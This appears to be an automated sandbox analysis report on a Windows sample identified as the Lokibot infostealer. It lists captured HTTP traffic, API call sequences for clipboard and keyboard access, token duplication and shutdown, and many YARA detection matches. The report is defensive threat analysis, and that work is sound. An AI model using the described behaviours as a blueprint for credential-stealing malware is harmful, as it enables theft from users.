Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 02:45:12 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BZrANVyfdSpX%2BKsicmGOggJoUTwDzNRbNXPv%2BNddJHiOgDK%2FL8jjtqBoZ%2Bhi906D42VJo9mDhXo0jKUVF4CWa1%2FSj7%2BFGfsyzwnpjciIs3OJQaASQY0PMKrOjAo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914b28bc5ed60f7c-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1650&min_rtt=1650&rtt_var=825&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 02:45:14 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yTjlACVTLGh5zici4gkACIGurjlhH1mJLx8lXhvXi%2Fh%2FlwxKYGOt37M7M0F05GOKRdhl9JS9%2BP%2BkMk5f5S2PgFS%2BqMzspFx%2FwBf0N9Y9PX%2BqSvwN2jb5Fs2KKMk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914b28c898f6424a-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1798&min_rtt=1798&rtt_var=899&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 02:45:16 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lyT0pAKIMRFVCsIKvNE0STnIanIU3velfjWzfPG%2Fn3cxNksYkJkJreMQTCMVDsZX4n5oUY7o%2BJCCb1a4tvuepuyhiB%2BfVoZHovQt4T2vWfT3P7ezDLjDXm8luaM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914b28d50c54184d-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1635&min_rtt=1635&rtt_var=817&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 02:45:18 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HRq6YPQN%2Bw6axKGEjq2SETts1WhKh2DmImds2pzo1NogNXe5yQvBN8JxkSsuPrBDDg5LQNiKpn1oks5h1Z7x4hkNcEignnFn2%2F7%2BZ0PKmWsHEFdylQq6QCblJrk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914b28e1a9f84201-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1617&min_rtt=1617&rtt_var=808&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Source: svchost.exe, svchost.exe, 00000001.00000002.2918036056.0000000000400000.00000040.80000000.00040000.00000000.sdmp

String found in binary or memory: http://www.ibsensoftware.com/

Source: C:\Users\user\Desktop\vsf098633534.exe

Code function: 0_2_00B54164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00B54164

Source: C:\Users\user\Desktop\vsf098633534.exe

Code function: 0_2_00B54164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00B54164

Source: C:\Users\user\Desktop\vsf098633534.exe

Code function: 0_2_00B53F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_00B53F66

Source: C:\Users\user\Desktop\vsf098633534.exe

Code function: 0_2_00B4001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_00B4001C

Source: C:\Users\user\Desktop\vsf098633534.exe

Code function: 0_2_00B6CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_00B6CABC

System Summary

Malicious sample detected (through community Yara rule)

Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.vsf098633534.exe.cf0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.vsf098633534.exe.cf0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.vsf098633534.exe.cf0000.1.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.vsf098633534.exe.cf0000.1.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.vsf098633534.exe.cf0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.vsf098633534.exe.cf0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.vsf098633534.exe.cf0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.vsf098633534.exe.cf0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.vsf098633534.exe.cf0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000001.00000002.2918036056.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000001.00000002.2918036056.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000001.00000002.2918036056.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000001.00000002.2918036056.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.2918036056.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000000.00000002.1677980665.0000000000CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.1677980665.0000000000CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.1677980665.0000000000CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000000.00000002.1677980665.0000000000CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1677980665.0000000000CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: Process Memory Space: vsf098633534.exe PID: 7020, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: svchost.exe PID: 7080, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00AE3B3A
Source: vsf098633534.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: vsf098633534.exe, 00000000.00000002.1677791650.0000000000B94000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_ef3b0ebc-e
Source: vsf098633534.exe, 00000000.00000002.1677791650.0000000000B94000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_3ec914ff-d
Source: vsf098633534.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_dede2965-f
Source: vsf098633534.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_5c03f107-f

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00D93540 RtlImageNtHeader,RpcMgmtSetServerStackSize,I_RpcServerDisableExceptionFilter,RtlSetProcessIsCritical,SetProcessMitigationPolicy,SetProcessMitigationPolicy,SetProcessMitigationPolicy,SetProtectedPolicy,HeapSetInformation,NtSetInformationProcess,	1_2_00D93540
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00D933C0 NtSetInformationProcess,SetUnhandledExceptionFilter,SetErrorMode,GetProcessHeap,InitializeSRWLock,InitializeSRWLock,RegDisablePredefinedCacheEx,EtwEventRegister,GetCommandLineW,memset,GetCurrentProcess,NtSetInformationProcess,HeapFree,HeapFree,ExitProcess,GetCurrentProcess,SetProcessAffinityUpdateMode,	1_2_00D933C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00D92720 RegOpenKeyExW,RegOpenKeyExW,RegOpenKeyExW,RegCloseKey,RegCloseKey,HeapAlloc,RegQueryValueExW,ExpandEnvironmentStringsW,LCMapStringW,RegQueryValueExW,HeapFree,AcquireSRWLockShared,ReleaseSRWLockShared,HeapAlloc,memcpy,memcpy,AcquireSRWLockExclusive,ReleaseSRWLockExclusive,RegGetValueW,ActivateActCtx,LoadLibraryExW,MultiByteToWideChar,RtlRunOnceExecuteOnce,NtQuerySystemInformation,GetProcAddress,DeactivateActCtx,ActivateActCtx,MultiByteToWideChar,RtlRunOnceExecuteOnce,NtQuerySystemInformation,GetProcAddress,DeactivateActCtx,ActivateActCtx,MultiByteToWideChar,RtlRunOnceExecuteOnce,NtQuerySystemInformation,GetProcAddress,DeactivateActCtx,RegCloseKey,HeapAlloc,RegGetValueW,WideCharToMultiByte,HeapAlloc,WideCharToMultiByte,HeapFree,ExpandEnvironmentStringsW,HeapFree,CreateActCtxW,GetLastError,HeapFree,HeapFree,GetLastError,CreateActCtxW,GetLastError,ReleaseActCtx,GetLastError,GetLastError,RtlNtStatusToDosError,GetLastError,LoadLibraryExW,RtlNtStatusToDosError,LoadLibraryExW,RtlNtStatusToDosError,HeapFree,ReleaseActCtx,	1_2_00D92720

Source: C:\Users\user\Desktop\vsf098633534.exe

Code function: 0_2_00B4A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

0_2_00B4A1EF

Source: C:\Users\user\Desktop\vsf098633534.exe

Code function: 0_2_00B38310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00B38310

Source: C:\Users\user\Desktop\vsf098633534.exe

Code function: 0_2_00B451BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_00B451BD

Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: 0_2_00AEE6A0	0_2_00AEE6A0
Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: 0_2_00B0D975	0_2_00B0D975
Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: 0_2_00AEFCE0	0_2_00AEFCE0
Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: 0_2_00B021C5	0_2_00B021C5
Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: 0_2_00B162D2	0_2_00B162D2
Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: 0_2_00B603DA	0_2_00B603DA
Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: 0_2_00B1242E	0_2_00B1242E
Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: 0_2_00B025FA	0_2_00B025FA
Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: 0_2_00AF66E1	0_2_00AF66E1
Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: 0_2_00B3E616	0_2_00B3E616
Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: 0_2_00B1878F	0_2_00B1878F
Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: 0_2_00B48889	0_2_00B48889
Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: 0_2_00AF8808	0_2_00AF8808
Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: 0_2_00B60857	0_2_00B60857
Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: 0_2_00B16844	0_2_00B16844
Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: 0_2_00B0CB21	0_2_00B0CB21
Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: 0_2_00B16DB6	0_2_00B16DB6
Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: 0_2_00AF6F9E	0_2_00AF6F9E
Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: 0_2_00AF3030	0_2_00AF3030
Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: 0_2_00B03187	0_2_00B03187
Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: 0_2_00B0F1D9	0_2_00B0F1D9
Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: 0_2_00AE1287	0_2_00AE1287
Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: 0_2_00B01484	0_2_00B01484
Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: 0_2_00AF5520	0_2_00AF5520
Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: 0_2_00B07696	0_2_00B07696
Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: 0_2_00AF5760	0_2_00AF5760
Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: 0_2_00B01978	0_2_00B01978
Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: 0_2_00B19AB5	0_2_00B19AB5
Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: 0_2_00B0BDA6	0_2_00B0BDA6
Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: 0_2_00B01D90	0_2_00B01D90
Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: 0_2_00B67DDB	0_2_00B67DDB
Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: 0_2_00AF3FE0	0_2_00AF3FE0
Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: 0_2_00AEDF00	0_2_00AEDF00
Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: 0_2_00CE3610	0_2_00CE3610
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040549C	1_2_0040549C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004029D4	1_2_004029D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00D92720	1_2_00D92720

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0041219C appears 45 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 00405B6F appears 42 times
Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: String function: 00B08900 appears 42 times
Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: String function: 00B00AE3 appears 70 times
Source: C:\Users\user\Desktop\vsf098633534.exe	Code function: String function: 00AE7DE1 appears 36 times

Source: vsf098633534.exe, 00000000.00000003.1673527760.00000000038ED000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs vsf098633534.exe
Source: vsf098633534.exe, 00000000.00000003.1675195892.0000000003743000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs vsf098633534.exe

Source: vsf098633534.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.vsf098633534.exe.cf0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.vsf098633534.exe.cf0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.vsf098633534.exe.cf0000.1.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.vsf098633534.exe.cf0000.1.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.vsf098633534.exe.cf0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.vsf098633534.exe.cf0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.vsf098633534.exe.cf0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.vsf098633534.exe.cf0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.vsf098633534.exe.cf0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000001.00000002.2918036056.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000001.00000002.2918036056.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000001.00000002.2918036056.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
